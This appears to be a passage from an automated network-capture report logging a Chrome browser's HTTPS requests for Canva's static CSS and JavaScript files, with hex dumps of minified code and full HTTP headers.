                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 3b 0a 65 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 3d 63 61 3b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 2d 31 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 28 65 20 69 6e 20 63 29 29 62 72 65 61 6b 20 61 3b 63 3d 63 5b 65 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 63 5b 61 5d 3b 62 3d 62 28 64 29 3b 62 21 3d 64 26 26 6e 75 6c 6c 21 3d 62 26 26 62 61 61 28 63 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a
                                                                                                                                                                                                                                                    Data Ascii: (c&&c.Math==Math)return c}throw Error("Cannot find global object");};ea=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&baa(c,a,{configurable:
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 65 78 70 65 63 74 65 64 20 61 6e 20 6f 62 6a 65 63 74 2c 20 66 6f 75 6e 64 3a 20 24 7b 61 7d 60 29 3b 72 65 74 75 72 6e 20 61 7d 3b 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 6f 6e 73 74 20 64 3d 63 26 26 63 2e 61 64 61 3b 63 3d 63 26 26 63 2e 6e 4a 61 3b 69 66 28 21 28 61 20 69 6e 20 72 61 29 29 7b 63 6f 6e 73 74 20 65 3d 73 65 6c 66 2e 62 6f 6f 74 73 74 72 61 70 3b 69 66 28 21 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 62 6f 6f 74 73 74 72 61 70 22 29 3b 72 61 5b 61 5d 3d 7b 2e 2e 2e 65 5b 61 5d 7d 3b 63 7c 7c 64 65 6c 65 74 65 20 65 5b 61 5d 7d 72 65 74 75 72 6e 20 66 61 61
                                                                                                                                                                                                                                                    Data Ascii: bject"!==typeof a)throw new TypeError(`expected an object, found: ${a}`);return a};ta=function(a,b,c){const d=c&&c.ada;c=c&&c.nJa;if(!(a in ra)){const e=self.bootstrap;if(!e)throw Error("Could not find bootstrap");ra[a]={...e[a]};c||delete e[a]}return faa
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 65 78 70 65 63 74 65 64 3a 20 7b 7d 22 2c 61 29 2c 4e 75 6d 62 65 72 28 61 29 3b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 72 65 74 75 72 6e 20 76 28 42 61 2e 68 61 73 28 61 29 2c 22 6f 62 6a 65 63 74 20 76 61 6c 75 65 20 65 78 70 65 63 74 65 64 3a 20 7b 7d 22 2c 61 29 2c 42 61 2e 67 65 74 28 61 29 3b 63 61 73 65 20 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 62 3d 79 61 2e 65 78 65 63 28 61 29 2c 6e 75 6c 6c 21 3d 62 3f 0a 62 5b 31 5d 3a 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 20 22 62 69 67 69 6e 74 22 3a 63 61 73 65 20 22 73 79 6d 62 6f 6c 22 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 60 75 6e 65 78 70 65 63 74 65 64 20 68 69 6e 74 20 74 79 70 65 3a 20 24 7b 62 7d 60 29 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20
                                                                                                                                                                                                                                                    Data Ascii: expected: {}",a),Number(a);case "object":return v(Ba.has(a),"object value expected: {}",a),Ba.get(a);case "string":return b=ya.exec(a),null!=b?b[1]:a;case "function":case "bigint":case "symbol":throw Error(`unexpected hint type: ${b}`);default:throw new


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    19192.168.2.449762104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC806OUTGET /web/4e14dd1571e90f68.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                    Content-Length: 2954
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0dfae98cad-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 105141
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "ac85bb6e45ed53967aa8e75ef43f1155"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Dec 2024 01:15:55 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 11 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: wVUn/P8hYGsTh4TOVgpKltfPo9B7KIKT937P0QAUsffFm2aPSbpNpY2dsGMs0eMpqusxVqzAOcQ=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: S08E23VPYF3WQQZ5
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: IderC_WRxSj1tXCryIEbt1UxMBxvGQ53
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 56 53 56 33 7a 56 42 69 64 62 79 33 55 31 69 38 46 46 61 59 54 42 78 6f 76 49 25 32 42 6a 75 48 25 32 42 79 44 4d 43 71 6b 77 38 78 6b 4f 49 76 58 66 63 59 71 79 43 6f 76 4f 38 31 62 5a 33 42 66 6f 71 4a 67 67 41 55 4c 66 63 6d 52 61 32 37 4f 44 55 35 45 25 32 46 54 37 74 73 45 48 75 75 6b 4f 39 6b 46 4f 30 62 35 6a 47 55 6e 53 74 72 79 45 50 71 59 57 64 4a 47 4a 71 72 47 39 5a 36 41 38 35 39 6f 6f 58 59 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSV3zVBidby3U1i8FFaYTBxovI%2BjuH%2ByDMCqkw8xkOIvXfcYqyCovO81bZ3BfoqJggAULfcmRa27ODU5E%2FT7tsEHuukO9kFO0b5jGUnStryEPqYWdJGJqrG9Z6A859ooXYU%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1205INData Raw: 2e 6e 4d 76 56 71 41 7b 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 61 72 65 61 73 3a 22 63 6f 72 6e 65 72 2d 62 6c 6f 63 6b 20 68 6f 72 69 7a 6f 6e 74 61 6c 2d 68 65 61 64 65 72 73 22 20 22 76 65 72 74 69 63 61 6c 2d 68 65 61 64 65 72 73 20 73 68 65 65 74 22 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 61 75 74 6f 20 31 66 72 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 72 6f 77 73 3a 61 75 74 6f 20 31 66 72 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6e 4d 76 56 71 41 2e 48 32 77 79 6b 77 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 6e 4d 76 56 71 41 2e 55 77 65 6c 64 41 7b 64 69 72 65 63 74 69 6f 6e 3a 72 74 6c 7d 2e 72 73 54 52 53 41 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23
                                                                                                                                                                                                                                                    Data Ascii: .nMvVqA{display:grid;grid-template-areas:"corner-block horizontal-headers" "vertical-headers sheet";grid-template-columns:auto 1fr;grid-template-rows:auto 1fr;position:relative}.nMvVqA.H2wykw{direction:ltr}.nMvVqA.UweldA{direction:rtl}.rsTRSA{background:#
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 31 65 62 66 66 7d 2e 73 54 71 64 77 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 65 47 56 62 6e 67 29 7d 2e 79 69 6d 6c 31 67 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 65 47 56 62 6e 67 29 7d 2e 6f 59 6c 68 58 41 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 31 70 39 39 77 29 7d 2e 64 32 75 4c 49 41 7b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 2d 65 6e 64 3a 2e 35 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 2d 73 74 61 72 74 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 69 6e 6c 69 6e 65 3a 2e 35 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 7d 2e 4a 68 42 7a 79 77 7b 62 6f 72 64 65 72 2d 62 6c 6f 63 6b 3a 2e 35 70 78 20
                                                                                                                                                                                                                                                    Data Ascii: round-color:#f1ebff}.sTqdww{background-color:var(--eGVbng)}.yiml1g{color:var(--eGVbng)}.oYlhXA{color:var(--d1p99w)}.d2uLIA{border-block-end:.5px solid #d9d9d9;border-block-start:1px solid #d9d9d9;border-inline:.5px solid #d9d9d9}.JhBzyw{border-block:.5px
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC380INData Raw: 2d 62 6c 6f 63 6b 7d 2e 5f 36 38 38 4b 57 67 2c 2e 6d 30 63 54 31 77 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 54 70 35 34 56 77 29 7d 2e 6d 30 63 54 31 77 7b 67 72 69 64 2d 61 72 65 61 3a 68 6f 72 69 7a 6f 6e 74 61 6c 2d 68 65 61 64 65 72 73 7d 2e 7a 6d 35 33 37 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 54 70 35 34 56 77 29 3b 67 72 69 64 2d 61 72 65 61 3a 76 65 72 74 69 63 61 6c 2d 68 65 61 64 65 72 73 7d 2e 56 44 46 76 5f 41 7b 67 72 69 64 2d 61 72 65 61 3a 73 68 65 65 74 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 32 70 78 29 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 32 70 78 29 7d 2e 63 36 61 31 65 51 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e
                                                                                                                                                                                                                                                    Data Ascii: -block}._688KWg,.m0cT1w{background:var(--Tp54Vw)}.m0cT1w{grid-area:horizontal-headers}.zm537g{background:var(--Tp54Vw);grid-area:vertical-headers}.VDFv_A{grid-area:sheet;height:calc(100% - 32px);width:calc(100% - 32px)}.c6a1eQ{pointer-events:none;position


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    20192.168.2.449765104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC806OUTGET /web/2c8d424892fc6ce6.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1184INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                    Content-Length: 3275
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0e1c0d4387-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 1274865
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "b3f15060196a297281486e58a2feddc4"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 05 Dec 2024 03:16:48 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 06 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: O0ATOTSCAKx0NinU9msd9eTmk7ZGMvlZK2MCEzN3gtykV1hDxnqVYs/WhZRf+/RNhsWT6q3B4oI=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: WJ0HBS39T3E7M1W1
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: .pYmmXoN26GNHw6ZUUJZ8Y8DCLcIXeCN
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 45 57 6d 66 6b 6e 4b 37 68 5a 4a 66 51 34 70 47 69 64 6f 67 6f 62 35 55 6b 64 6f 51 4e 73 68 51 47 70 4a 65 25 32 46 25 32 46 64 76 5a 48 70 6c 25 32 42 6d 5a 6a 78 7a 76 71 38 61 7a 6c 6c 77 76 76 32 70 66 61 61 50 57 6c 53 45 4e 34 65 6e 25 32 46 62 7a 30 5a 49 66 5a 4d 73 77 4e 59 77 64 50 4d 56 4c 55 56 64 35 57 41 75 34 37 38 64 58 48 55 70 51 46 4c 4f 4d 59 25 32 42 6c 74 51 41 30 61 65 54 4e 39 44 54 79 39 31 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWmfknK7hZJfQ4pGidogob5UkdoQNshQGpJe%2F%2FdvZHpl%2BmZjxzvq8azllwvv2pfaaPWlSEN4en%2Fbz0ZIfZMswNYwdPMVLUVd5WAu478dXHUpQFLOMY%2BltQA0aeTN9DTy914%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 2e 56 61 57 38 5f 41 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 7d 2e 56 61 57 38 5f 41 2e 63 55 46 46 52 41 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 7d 2e 79 43 54 37 30 51 7b 72 3a 35 30 25 7d 2e 79 43 54 37 30 51 2e 5f 32 4c 56 50 5f 67 7b 72 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 70 78 29 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 70 78 3b 70 61 69 6e 74 2d 6f 72 64 65 72 3a 66 69 6c 6c 7d 2e 63 55 46 46 52 41 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 7d 2e 63 55 46 46 52 41 2e 5f 32 4c 56 50 5f 67 7b 78 3a 31 70 78 3b 79 3a 31 70 78 3b 72 78 3a 63 61 6c 63 28 28 76 61 72 28 2d 2d 5f 5f 55 4c 67 51 29 20 2d 20 32 70 78 29 2a 2e 31 29 3b 72 79 3a 63 61 6c 63 28 28 76 61 72 28 2d 2d 5f 5f 55 4c 67 51 29 20
                                                                                                                                                                                                                                                    Data Ascii: .VaW8_A{border-radius:9999px}.VaW8_A.cUFFRA{border-radius:4px}.yCT70Q{r:50%}.yCT70Q._2LVP_g{r:calc(50% - 1px);stroke-width:2px;paint-order:fill}.cUFFRA{border-radius:4px}.cUFFRA._2LVP_g{x:1px;y:1px;rx:calc((var(--__ULgQ) - 2px)*.1);ry:calc((var(--__ULgQ)
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 46 65 64 4a 30 51 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 5f 32 4c 72 36 70 51 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 5f 32 4c 72 36 70 51 2e 45 64 65 77 4e 77 20 2e 5a 5f 57 76 7a 51 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 2e 30 32 35
                                                                                                                                                                                                                                                    Data Ascii: dth:100%;position:relative;white-space:nowrap}.FedJ0Q:hover{cursor:default}._2Lr6pQ{box-sizing:border-box;display:inline-flex;max-width:100%;overflow:hidden;text-align:start;vertical-align:bottom;visibility:hidden}._2Lr6pQ.EdewNw .Z_WvzQ{margin-left:1.025
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC537INData Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 55 5f 51 48 5f 41 2e 43 39 58 4c 38 67 7b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 7d 2e 55 5f 51 48 5f 41 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 58 65 6d 54 64 51 2c 2e 5f 32 4c 72 36 70 51 7b 70 61 64 64 69 6e 67 3a 30 20 2e 33 65 6d 20 30 20 2e 32 65 6d 7d 2e 58 65 6d 54 64 51 3a 6e 6f 74 28 2e 70 7a 58 79 55 41 29 3a 6e 6f 74 28 2e 5f 36 5a 70 50 72 77 29 2c 2e 5f 32 4c 72 36 70 51 3a 6e 6f 74 28 2e 70 7a 58 79 55 41 29 3a 6e 6f 74 28 2e 5f 36 5a 70 50 72 77 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 32 65 6d 7d 2e 58 65 6d 54 64 51 3a 6e 6f 74 28 2e 45 64 65 77 4e 77 29 2c 2e 5f 32 4c 72 36 70 51 3a 6e 6f 74
                                                                                                                                                                                                                                                    Data Ascii: rflow:hidden}.U_QH_A.C9XL8g{text-overflow:ellipsis}.U_QH_A::selection{background:transparent}.XemTdQ,._2Lr6pQ{padding:0 .3em 0 .2em}.XemTdQ:not(.pzXyUA):not(._6ZpPrw),._2Lr6pQ:not(.pzXyUA):not(._6ZpPrw){padding-right:.2em}.XemTdQ:not(.EdewNw),._2Lr6pQ:not


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    21192.168.2.449764104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC794OUTGET /web/f0398d1166314304.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 115121
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0e2eb74338-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 1946696
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "cb1826af86c8190ceb1ff4f70e255c6d"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 23 Oct 2024 01:12:53 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 24 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: obf24c+YF9xXl/rmhD6WRszPq8SrqjFdUfGDh+41/JP3UlzybS/ZPUFJWgnDtmbusdkllCfDi2s=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: BTKRNYJWXEZQPM2Y
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: 9Gmf.e8cCdjPD0iyMK2k7YgD6MdjsLKJ
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
